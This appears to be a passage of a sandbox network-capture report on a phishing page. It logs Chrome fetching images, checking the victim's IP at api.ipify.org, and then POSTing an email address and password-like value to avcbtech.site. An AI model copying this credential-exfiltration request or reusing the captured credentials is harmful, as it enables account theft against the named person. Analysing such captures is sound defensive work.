42 b8 35 1b 0c 86 66 cd 9a 85 61 38 a0 01 93 97 97 37 65 ca 94 65 cb 96 51 f0 b6 a4 a4 24 84 e2 f3 dd ba 75 23 47 a8 76 ad fe fa 85 75 ac a8 94 8b ae 31 4d 89 26 cf 1e 7c f9 Data Ascii: jatRTyXp:u k}gv]F/$_Q\|H>+1[qGO?q[n*KEYWK0A&'!]Te]/O-C!n{!^M_]wE!v-IB5fa87eeQ$u#Gvu1M&\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49750	199.232.88.193	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:29:12 UTC	386	OUT	GET /0HdPsKK.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:29:12 UTC	761	IN	HTTP/1.1 200 OK Connection: close Content-Length: 5579 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 02:14:56 GMT ETag: "28a8812c3aaf8af83ba5c83c58750528" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: YYTlmwzZRLqXoGXppDaHC3Gtdw92u8SHfCwF9eVUy31VA6g75HGzNw== cache-control: public, max-age=31536000 Accept-Ranges: bytes Date: Thu, 27 Mar 2025 17:29:12 GMT Age: 802262 X-Served-By: cache-iad-kiad7000021-IAD, cache-ewr-kewr1740048-EWR X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 1296, 1 X-Timer: S1743096553.815165,VS0,VE1 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-03-27 17:29:12 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 00 55 08 06 00 00 00 a6 46 3a 96 00 00 15 92 49 44 41 54 78 9c ec 9d 0b 94 5b 55 bd ff bf bf 73 92 4c 87 4e 0b 14 da 22 85 ce b4 50 40 d4 5a 44 84 76 48 ce 49 67 0a 88 2f a4 88 8a 02 ca fa 03 fe 51 c1 85 02 2e 04 9a b2 00 29 78 e1 e2 c5 07 57 91 87 d6 8b 08 f5 a2 82 80 b4 d9 c9 cc 14 aa 94 87 0f b4 0a a5 14 4a 6b a9 d4 76 66 3a d3 49 72 7e 77 9d 24 33 ce 24 fb 24 27 cf 33 e9 ec cf 5a b3 26 d9 cf ef 49 b2 7f fb bd b7 0f 0a c5 04 a1 ef c6 39 33 91 e4 d3 99 71 1a 33 e6 10 61 0a c0 53 19 98 4a a0 96 7f 87 e4 1d 0c fc 8e 40 bf d7 60 3d 9b 0a a4 9e 9e 7a f5 96 7f 7a a9 bd 56 90 d7 02 14 8a 5a 32 70 c3 9c d6 64 d2 ba 08 a0 0f 01 78 6f 05 49 fd 01 b0 1e 06 f0 d0 94 c8 e6 97 aa 28 d1 53 94 01 50 ec Data Ascii: PNGIHDRUF:IDATx[UsLN"P@ZDvHIg/Q.)xWJkvf:Ir~w$3$$'3Z&I93q3aSJ@`=zzVZ2pdxoI(SP
2025-03-27 17:29:12 UTC	1371	IN	Data Raw: 34 f9 e0 31 ce b4 df 3b 6a 97 27 e1 a4 a1 ff 35 22 40 ec ba e2 41 15 0a 17 ec 5e d6 7a 35 11 be 61 ff 74 bd d6 d2 28 d0 7e 07 a2 f9 bc 95 d0 66 4a 06 e8 53 7b 91 78 ec 4c 20 59 bb 9b c3 fc 9c 3c 82 96 76 6f 2c 14 46 b5 00 14 05 e9 bd be cd 80 85 fb 01 cc f6 5a 4b 23 a1 1d 7c 04 9a 3f 7b 1f 68 ff 59 f2 00 7a 13 f4 a3 3e 8d d4 4b 77 d7 4c c3 10 e9 37 03 38 bb 50 18 35 08 a8 70 a4 2f d2 7a 0e 2c 7e 4a 15 fe d2 f0 7f e0 3c ec 77 f1 a3 ce 85 3f 0b cd fb 24 68 c6 09 35 d3 41 8c a5 fc ab c5 05 45 28 03 a0 90 b2 3b d2 b6 82 41 2b 01 52 ad 44 17 50 cb 74 f8 17 5d 84 c9 5f 5e 83 a6 0f 2e 07 7c 4d c5 e3 68 7e f8 da 6f 81 36 e7 63 35 12 45 5a 22 91 ba bc 60 90 da e4 ac 68 64 fa 96 b7 5d c6 8c ff f4 5a 47 4d b0 0b a6 a6 03 a4 a7 2f 1a a2 e1 d7 9a 96 fd 6f bf d7 d2 ff Data Ascii: 41;j'5"@A^z5at(~fJS{xL Y<vo,FZK#\|?{hYz>KwL78P5p/z,~J<w?$h5AE(;A+RDPt]_^.\|Mh~o6c5EZ"`hd]ZGM/o
2025-03-27 17:29:12 UTC	1371	IN	Data Raw: fa a6 69 7e 4b 08 51 93 93 32 42 a1 d0 22 22 ac c8 3d fc 9a 08 f6 e7 54 b6 01 20 c2 25 00 bd ab 48 98 31 0d 6c c3 30 77 12 e1 16 21 c4 cd 2e b3 69 a9 e4 fb 20 42 3f 80 3c 03 60 18 e1 eb 00 1c d1 dc dc bc 33 1c 0e ff 66 4c 17 20 14 0a cd 63 a6 f5 44 da 2d 00 1d 50 3c 13 5a a2 69 78 c4 34 cd 7b ca 15 5a 6d 4c d3 bc 9d 48 8b 3b 15 fe b1 d0 c1 00 dd 69 9a e1 67 82 c1 60 0d 2f 6c af 17 e9 e7 f9 8c a6 f1 6a c3 30 9f ec e8 e8 70 bc 12 6a 22 a0 69 da 97 e5 3e 74 b0 69 9a e7 d7 53 0b 11 1d 08 d0 37 0d 23 1c eb ec ec dc bf 9e 79 0f 63 18 c6 12 66 7a 06 e0 29 cc 34 c3 6e dd 8f 18 80 70 38 7c 3c 91 b6 9e 08 c7 96 9e 34 7d ce 30 c2 45 b7 3e 31 53 4d ef 21 30 4d f3 71 80 be 52 46 d4 13 75 5d 7f 6e f1 e2 c5 ad c5 02 32 b3 f4 19 9c dc 8b f9 d5 0a db 38 a7 52 a9 67 3b 3a Data Ascii: i~KQ2B""=T %H1l0w!.i B?<`3fL cD-P<Zix4{ZmLH;ig`/lj0pj"i>tiS7#ycfz)4np8\|<4}0E>1SM!0MqRFu]n28Rg;:
2025-03-27 17:29:12 UTC	1371	IN	Data Raw: e9 af 37 3e 22 6c 01 c6 4e 01 12 e1 7d c1 60 70 7a 57 57 97 b4 70 95 0b 33 51 0d 96 02 49 8f 5e 65 e6 25 00 d6 15 8a 18 0c 06 df 41 44 ef c9 75 27 42 a1 2f c7 69 d9 aa a3 c1 91 75 b3 b2 1a 77 15 d2 e7 44 21 63 e3 34 b7 cd 4c af 95 93 97 3b 3d e3 63 11 10 91 f6 c5 5c 37 66 fc c1 b2 ac 79 a6 69 ce cb 3a 49 47 fc 75 5d bf 14 40 91 be 75 35 e0 fb 84 10 05 c7 d7 90 5d 08 a4 eb d2 ad 3a 1b 8a 4f b9 f2 a0 5b 35 3e 66 ea 22 c2 82 5c 0f 5d d7 bf 0a c0 51 a8 69 9a 2d cc f8 1b 51 7e 6b 61 60 60 cf fe eb d6 ad ab d7 65 68 4f c9 9d e9 0b ed ed ed 77 f4 f4 f4 f4 3a 45 d4 75 5d ba 70 89 d9 f9 98 6c 22 da 29 5f ce a4 1d 59 40 e3 09 32 47 cb b2 a4 f7 b5 55 06 fd 87 dc dd 72 f8 9c 8a e1 66 1d 00 ff a3 bc b4 ab 47 38 1c 5e ca 8c 59 b9 ee 44 98 0f 50 b4 78 0a 74 7e 47 47 c7 Data Ascii: 7>"lN}`pzWWp3QI^e%ADu'B/iuwD!c4L;=c\7fyi:IGu]@u5]:O[5>f"\]Qi-Q~ka``ehOw:Eu]pl")_Y@2GUrfG8^YDPxt~GG
2025-03-27 17:29:12 UTC	95	IN	Data Raw: 4b b7 97 77 74 74 cc 4c a5 52 3f c9 f7 e1 bc 01 38 19 42 88 87 4c d3 8c e4 0f 6c 51 c1 c1 59 66 7c 57 72 26 a0 54 63 2c 16 5d 66 9a 66 22 b7 ac 11 01 93 26 4d 3a 56 b6 79 0b 99 59 80 de 0a 3e af 51 69 14 e6 ff 02 00 00 ff ff 5a 98 a3 a9 0f 7b c2 43 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: KwttLR?8BLlQYf\|Wr&Tc,]ff"&M:VyY>QiZ{CIENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49749	199.232.88.193	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:29:12 UTC	386	OUT	GET /KAb5SEy.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:29:12 UTC	761	IN	HTTP/1.1 200 OK Connection: close Content-Length: 48869 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 13:35:05 GMT ETag: "8aa14660517f5460156fccc2199cf83c" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: ZMDtIIYNSizYrfDVWXb5ZuJtkSbNLszxoUAHUCL9zZz9IlMMufkJOg== cache-control: public, max-age=31536000 Accept-Ranges: bytes Date: Thu, 27 Mar 2025 17:29:12 GMT Age: 2848625 X-Served-By: cache-iad-kjyo7100129-IAD, cache-ewr-kewr1740095-EWR X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 4, 23 X-Timer: S1743096553.815721,VS0,VE1 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-03-27 17:29:12 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 a7 00 00 02 3e 08 02 00 00 00 0e ee 34 d8 00 00 80 00 49 44 41 54 78 9c ec bd 77 7c 14 e5 da ff bf b3 b3 7d 37 3d 10 0c 3d 94 50 42 11 54 10 8f 22 d6 a3 1e 45 e4 b1 60 45 54 1e 11 45 ba 22 52 45 a4 89 05 eb 51 44 fd 3e 3e a8 14 c1 47 39 08 7a 10 14 50 94 5e 12 6a 28 21 04 48 48 48 d9 36 ed f7 3a 5c fe 6e c7 94 d9 cd 92 9d 6c 76 3f ef 3f 7c 6d 76 67 97 7b dc d9 f9 dc f7 75 5f 9f eb 32 29 8a 62 00 00 00 00 40 0c 60 ac ef 01 00 00 00 00 40 27 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 01 aa 0f 00 00 00 c4 0a 50 7d 00 00 00 20 56 80 ea 03 00 00 00 b1 02 54 1f 00 00 00 88 15 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 Data Ascii: PNGIHDR>4IDATxw\|}7==PBT"E`ETE"REQD>>G9zP^j(!HHH6:\nlv??\|mvg{u_2)b@`@'@b>+@XP} VT@b>+@X
2025-03-27 17:29:12 UTC	1371	IN	Data Raw: 95 de 05 00 00 20 34 f8 a9 53 a7 d6 f7 18 40 1d 50 a9 2c 2e 7b 92 64 d8 ef f7 7f f0 c1 07 6f bf fd f6 91 23 47 2e fe df a2 cf ac a9 05 1f 1d 40 35 79 68 f6 c0 f3 bc c5 62 a9 6d 96 80 d9 6c 16 45 f1 d4 a9 53 1e 8f 27 23 23 23 35 35 d5 68 34 92 2b e1 e2 4f 01 00 00 62 13 44 f8 1b 3c b4 94 67 02 4c 79 fb a4 8e 24 90 a2 28 2e 58 b0 60 ee dc b9 a7 4e 9d ba 98 7f a8 da 9d 7e b5 47 40 7d 24 2b d3 1b f2 05 46 19 00 b4 0b f0 d8 63 8f 8d 1f 3f 1e 8e 3e 00 00 b8 48 a0 fa 51 8e db ed 9e 33 67 ce 82 05 0b ce 9d 3b 47 4b f0 da c6 c9 d5 95 74 6b 82 2d fd 69 7b be ea 4b 3c cf 57 7a 3e 18 58 8e a1 cd 66 7b e0 81 07 46 8e 1c 99 95 95 55 db 0f 01 00 00 c0 40 84 3f 4a 10 04 81 a5 eb b3 75 7f 41 41 c1 dc b9 73 17 2c 58 50 52 52 62 32 99 ec 76 bb cf e7 ab ed 27 b3 d5 3c fd 49 Data Ascii: 4S@P,.{do#G.@5yhbmlES'###55h4+ObD<gLy$(.X`N~G@}$+Fc?>HQ3g;GKtk-i{K<Wz>Xf{FU@?JuAAs,XPRRb2v'<I
2025-03-27 17:29:12 UTC	1371	IN	Data Raw: 15 15 15 4c ec 03 a6 22 32 1f 3f 1d 4c 66 01 83 c1 30 7a f4 e8 f1 e3 c7 a7 a5 a5 85 6f c0 00 00 d0 a0 81 ea 47 1c 14 ee 0e 78 d8 a2 45 8b c6 8c 19 53 5c 5c 1c c2 3f c1 8a dd 5a ad 56 9f cf c7 71 5c db b6 6d 37 6e dc 18 17 17 67 b3 d9 2a 25 de 87 1b 51 14 1f 79 e4 91 ff fd df ff 25 39 3f 7f fe 7c b5 c2 1f 8c 8f df 6c 36 0f 1c 38 70 da b4 69 e4 33 84 9d 0f 00 00 2a 81 08 7f c4 11 8c dc 2e 5c b8 70 fa f4 e9 05 05 05 54 0a b7 b6 9f 4f 85 71 52 52 52 68 b9 7c e7 9d 77 fe f3 9f ff 6c d2 a4 09 49 be 7a 27 5e dd cb 27 4c 18 8d c6 56 ad 5a 71 1c 97 9d 9d 5d 5e 5e 6e b5 5a 5d 2e 97 db ed b6 58 2c ea 7f 9d 02 fb 26 93 a9 a6 3a 04 e4 e3 3f 79 f2 a4 ba 1f 3f 6b 4a 04 00 00 00 aa df 90 20 09 14 45 f1 bd f7 de 9b 3c 79 72 7e 7e be d9 6c 0e c1 94 4f da 69 b3 d9 4a 4b 4b Data Ascii: L"2?Lf0zoGxES\\?ZVq\m7ng%Qy%9?\|l68pi3.\pTOqRRRh\|wlIz'^'LVZq]^^nZ].X,&:?y?kJ E<yr~~lOiJKK
2025-03-27 17:29:12 UTC	1371	IN	Data Raw: ab 55 c7 53 a9 4b a8 83 0e f9 f8 3d 1e cf d1 a3 47 7d 3e 1f 2d f4 59 25 c1 9a 36 f5 69 cb 9f 22 25 54 9e 48 14 45 af d7 0b 1f 3f 00 20 36 81 73 2f 52 c8 cb cb 9b 32 65 ca 47 1f 7d 44 5e 3b e1 02 06 83 21 2e 2e 4e 14 45 ed 7d 7d 52 7d 52 3e 2a 64 6b 36 9b 37 6e dc d8 b5 6b 57 1d cf 40 0f 3c 1e cf 8d 37 de b8 7d fb 76 b7 db cd f3 3c c9 79 40 1f bf c3 e1 50 14 85 fe 1f da 6c 36 56 d9 10 3e 7e 00 40 ac d1 90 12 bb 1a 28 1a cb 50 b6 7c cf ce ce 1e 39 72 e4 a2 45 8b e8 4f b7 db cd 5e 2a 2b 2b 23 b9 aa 94 9f cf 48 48 48 20 f7 5a 7c 7c 3c 6d ed f7 ee dd fb b7 df 7e 8b 3e c9 a7 3a 45 1b 36 6c e8 df bf 3f ed 59 24 24 24 50 be 82 c5 62 a9 94 a5 68 34 1a d9 8e 86 db ed 66 d3 26 af d7 cb be 91 05 0b 16 8c 1e 3d fa d0 a1 43 f4 67 08 e5 8d 01 00 a0 61 81 08 7f d8 d1 b0 Data Ascii: USK=G}>-Y%6i"%THE? 6s/R2eG}D^;!..NE}}R}R>dk67nkW@<7}v<y@Pl6V>~@(P\|9rEO^++#HHH Z\|\|<m~>:E6l?Y$$$Pbh4f&=Cga
2025-03-27 17:29:12 UTC	1371	IN	Data Raw: de 7d fb f6 29 8a 02 1f 3f 00 a0 a1 03 bf 7e 18 f9 f5 d7 5f 6f bf fd f6 b3 67 cf 5a 2c 16 5a af d3 da 5d 92 24 9b cd a6 b1 bb cf 1c e7 f4 20 21 21 a1 57 af 5e 2b 57 ae b4 d9 6c fa 9e 41 83 27 64 1f bf 24 49 34 45 a3 5a fd 34 f7 1a 37 6e dc d8 b1 63 d5 7b fc 55 d3 36 01 00 20 92 81 25 a9 8e 61 8b f8 8d 1b 37 0e 1b 36 ec ec d9 b3 a4 3d 34 bb 12 45 91 84 87 49 3e 2b a7 4f e9 7b 1c c7 31 3b 7e 42 42 02 3d b8 f3 ce 3b 21 f9 a1 51 93 8f 9f 59 f6 09 da 55 61 fa 5d 5e 5e ce ea 28 78 3c 1e f6 9d be f6 da 6b 23 47 8e 3c 72 e4 08 fd 29 08 02 24 1f 00 d0 b0 40 84 bf 2e 51 14 85 dc f6 bb 76 ed 9a 31 63 c6 fa f5 eb 2d 16 8b 76 8d 17 16 6b 61 f6 3c 2a ba 27 cb b2 c7 e3 31 9b cd 4f 3e f9 e4 c8 91 23 11 58 0e 19 f2 f1 cb b2 bc 77 ef 5e b7 db 6d b7 db 5d 2e 97 db ed 66 33 Data Ascii: })?~_ogZ,Z]$ !!W^+WlA'd$I4EZ47nc{U6 %a76=4EI>+O{1;~BB=;!QYUa]^^(x<k#G<r)$@.Qv1c-vka<*'1O>#Xw^m].f3
2025-03-27 17:29:12 UTC	1371	IN	Data Raw: 7e f8 e1 a1 87 1e ca cb cb a3 4b ba ac ac 4c 96 65 9e e7 99 c3 48 92 24 9f cf 47 9e 94 a2 a2 a2 23 47 8e dc 73 cf 3d f5 3d 70 10 5e a0 fa a1 40 92 ff eb af bf 4e 99 32 e5 f0 e1 c3 d4 2f a7 b6 6e 08 12 92 c7 1e 7b 6c c6 8c 19 b4 59 00 c9 d7 19 b5 8f bf 7b f7 ee 65 65 65 db b7 6f af ad 8f df 64 32 09 82 a0 f6 f1 53 3f 7e f8 f8 41 fd b2 7c f9 f2 91 23 47 16 14 14 50 6b 69 ba e1 a8 a7 b0 74 db 61 7d a4 14 45 39 78 f0 e0 ed b7 df de a4 49 93 7a 1d 38 08 2f 50 fd 5a 43 e1 fd a2 a2 a2 59 b3 66 ad 5e bd 3a 98 ce ad d5 62 b1 58 ee bd f7 de 09 13 26 20 1a 5c bf d0 8e 7e 72 72 72 68 3e 7e 93 c9 44 0d 96 d4 3e fe 9c 9c 1c ea c7 0f 1f 3f d0 1f bf df bf 6c d9 b2 b9 73 e7 ee dd bb 97 d5 0e b1 58 2c 0e 87 83 1e 3b 9d 4e 8a 35 92 9f 85 2e 60 45 51 44 51 6c d4 a8 51 bf 7e Data Ascii: ~KLeH$G#Gs==p^@N2/n{lY{eeeod2S?~A\|#GPkita}E9xIz8/PZCYf^:bX& \~rrrh>~D>?lsX,;N5.`EQDQlQ~
2025-03-27 17:29:12 UTC	1371	IN	Data Raw: 6a fd e6 9b 6f d8 ce 3d 68 88 f8 fd 7e 56 a2 3c 21 21 81 1e b0 0a 3f 44 25 1f bf 06 c3 86 0d a3 8f ad a8 a8 a8 ef 33 03 0d 92 a5 4b 97 a6 a7 a7 53 05 1e 8d 2b 8d 5d a2 64 3d 65 8f 0d 06 43 62 62 22 bd da ae 5d bb e5 cb 97 d7 f7 09 01 9d 40 84 3f 00 54 63 67 e5 ca 95 9f 7f fe 39 f9 f4 6a 82 b5 cd 65 6d 2d 98 cb 6b e4 c8 91 0f 3f fc b0 d5 6a 85 71 ab e1 c2 f3 7c cb 96 2d 65 59 56 f7 e3 77 bb dd b5 ed c7 4f 1c 3b 76 4c 92 a4 bf fd ed 6f b4 4f 84 fd 1d 50 2b 96 2e 5d 3a 6d da b4 c3 87 0f 07 ac f3 a1 76 99 b2 c7 1c c7 c5 c7 c7 9f 3f 7f 5e 96 e5 ac ac ac d1 a3 47 df 7d f7 dd b8 08 63 85 fa 9e 76 44 34 1e 8f 47 51 94 bc bc bc 9b 6f be 99 fe 77 69 af f5 69 e2 4c 3d 57 d8 cc ba 53 a7 4e c7 8e 1d ab ef 53 01 75 c3 a1 43 87 fe eb bf fe 8b be 6e 5a 63 31 81 57 5f 1b Data Ascii: jo=h~V<!!?D%3KS+]d=eCbb"]@?Tcg9jem-k?jq\|-eYVwO;vLoOP+.]:mv?^G}cvD4GQowiiL=WSNSuCnZc1W_
2025-03-27 17:29:12 UTC	1371	IN	Data Raw: be 42 20 a1 3a 36 81 2f 1f 84 15 a8 fe 5f a0 9b f5 d9 b3 67 3f f9 e4 13 ba e7 32 87 2b 9b 44 6b 7f c2 ed b7 df 7e fd f5 d7 ab df 08 a2 1e ea 9a 68 30 18 2e bd f4 d2 71 e3 c6 5d 77 dd 75 21 7c 88 d9 6c ce cb cb 5b b7 6e 5d 18 06 08 1a 12 a1 f5 cb 57 d7 d8 67 21 81 b4 b4 b4 99 33 67 3e f8 e0 83 f4 a7 28 8a 54 6d 0c 61 a4 58 06 aa ff 17 28 b8 fa d5 57 5f 9d 3c 79 92 04 5e dd 4f 5d bb 59 b5 28 8a 8d 1a 35 7a f0 c1 07 69 4a ae ee a3 0f a2 1b 8e e3 58 06 f5 35 d7 5c f3 d0 43 0f a5 a4 a4 d4 f6 43 28 ee fa d5 57 5f 51 55 47 10 83 c0 97 0f 74 00 aa ff 27 14 d2 17 45 71 e5 ca 95 ec c7 43 6d 2a 58 b1 55 ed 39 72 87 0e 1d ae bd f6 5a 0a a3 e9 38 70 50 9f b0 4b 42 10 04 7a 7c d7 5d 77 3d fc f0 c3 b5 fd 1c 59 96 39 8e db b0 61 03 25 6c 83 18 04 be 7c a0 03 50 fd 3f a1 Data Ascii: B :6/_g?2+Dk~h0.q]wu!\|l[n]Wg!3g>(TmaX(W_<y^O]Y(5ziJX5\CC(W_QUGt'EqCm*XU9rZ8pPKBz\|]w=Y9a%l\|P?
2025-03-27 17:29:12 UTC	1371	IN	Data Raw: d0 a0 81 03 07 d2 f3 f0 e5 83 d0 80 ea 1b 28 81 bf 56 de 2a fa 8d 25 24 24 b4 6d db 56 97 01 82 86 8a cf e7 a3 1b 7d 90 f7 65 3a 8c f6 71 c3 3f 3a 10 5e c8 97 bf 7f ff fe b8 b8 38 ca c2 a3 1a ba e4 cb b7 5a ad 54 e6 ab 26 e8 56 c3 56 f9 83 06 0d 1a 3e 7c 38 7b 95 f9 f2 65 59 46 f3 5c 10 3c b8 b3 18 dc 6e 37 f5 d9 a3 1b 6e c0 58 19 a5 ee 1b 0c 86 e1 c3 87 23 b0 06 b4 d9 bb 77 2f b3 60 49 92 a4 a1 e5 14 ec 95 24 89 dc 59 8d 1b 37 d6 77 a4 a1 a0 2d 5a 31 0e f5 cb df bf 7f bf c3 e1 20 c9 af b6 5f 3e 05 17 ab 9d ea c5 c5 c5 91 ea b7 6f df fe bd f7 de 53 4b 3e 03 fd f2 41 6d c1 5a df 70 e8 d0 21 8a b6 a9 db ea 68 37 e0 a1 fb 78 46 46 06 02 6b 40 9b 9c 9c 1c 75 8a b5 46 e5 47 36 83 54 14 25 35 35 55 c7 31 d6 1a 3a 05 ab d5 4a b9 e8 f9 f9 f9 a7 4f 9f 3e 7e fc b8 Data Ascii: (V*%$$mV}e:q?:^8ZT&VV>\|8{eYF\<n7nX#w/`I$Y7w-Z1 _>oSK>AmZp!h7xFFk@uFG6T%55U1:JO>~
2025-03-27 17:29:12 UTC	1371	IN	Data Raw: fa 6a ba ef 87 61 74 b5 a3 ea 52 9e 54 9f e7 79 a3 d1 58 ab 8e c0 91 70 3a 75 88 20 08 6b d7 ae 7d e6 99 67 76 ef de 5d c9 97 af fd 46 b5 2f 9f 24 5f 51 94 aa be 7c 48 3e 08 2b 31 ad fa 05 05 05 da 5b 71 d5 92 96 96 96 98 98 18 9e 11 81 06 cc f6 ed db 47 8d 1a f5 d3 4f 3f 71 1c 17 da ea f6 96 5b 6e c9 cc cc 0c c3 d0 ea 0c 2a bb 4b 45 87 aa 0d 59 57 4b 30 db ff 0d 08 f8 f2 41 83 26 a6 27 95 05 05 05 21 dc 8f d0 5d 17 54 65 d7 ae 5d 2f bf fc f2 f7 df 7f 4f 2d 98 43 88 21 b5 6e dd fa 9e 7b ee 21 d9 88 cc d5 5e a5 08 7f 90 92 1f 4d 84 a3 5f fe 5d 77 dd 45 cf c3 97 0f f4 21 76 af 2d 49 92 42 b8 35 1b 0c 86 66 cd 9a 85 61 38 a0 01 93 97 97 37 65 ca 94 65 cb 96 51 f0 b6 a4 a4 24 84 e2 f3 dd ba 75 23 47 a8 76 ad fe fa 85 75 ac a8 94 8b ae 31 4d 89 26 cf 1e 7c f9 Data Ascii: jatRTyXp:u k}gv]F/$_Q\|H>+1[qGO?q[n*KEYWK0A&'!]Te]/O-C!n{!^M_]wE!v-IB5fa87eeQ$u#Gvu1M&\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49755	172.67.74.152	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:29:25 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:29:25 UTC	465	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:29:25 GMT Content-Type: application/json Content-Length: 22 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92709c1e3ba719c3-EWR server-timing: cfL4;desc="?proto=TCP&rtt=89428&min_rtt=89305&rtt_var=19027&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=1121&delivery_rate=34081&cwnd=252&unsent_bytes=0&cid=aa293f23d7b797a4&ts=243&x=0"
2025-03-27 17:29:25 UTC	22	IN	Data Raw: 7b 22 69 70 22 3a 22 34 35 2e 39 32 2e 32 32 39 2e 31 33 38 22 7d Data Ascii: {"ip":"45.92.229.138"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49756	104.26.12.205	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:29:25 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:29:26 UTC	432	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:29:26 GMT Content-Type: application/json Content-Length: 22 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92709c217b45c42c-EWR server-timing: cfL4;desc="?proto=TCP&rtt=88972&min_rtt=88591&rtt_var=19297&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=961&delivery_rate=33984&cwnd=252&unsent_bytes=0&cid=3f5ff444fc0b7bfc&ts=265&x=0"
2025-03-27 17:29:26 UTC	22	IN	Data Raw: 7b 22 69 70 22 3a 22 34 35 2e 39 32 2e 32 32 39 2e 31 33 38 22 7d Data Ascii: {"ip":"45.92.229.138"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49758	104.168.138.190	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:29:33 UTC	634	OUT	POST /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 58 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:29:33 UTC	58	OUT	Data Raw: 61 69 3d 6d 69 63 68 61 65 6c 2e 6d 61 73 73 65 6c 6c 69 25 34 30 70 68 61 72 6d 61 2e 63 6f 6d 26 70 72 3d 34 25 37 42 55 2e 72 73 4f 38 25 35 42 79 25 32 42 25 33 46 38 7a Data Ascii: ai=michael.masselli%40pharma.com&pr=4%7BU.rsO8%5By%2B%3F8z
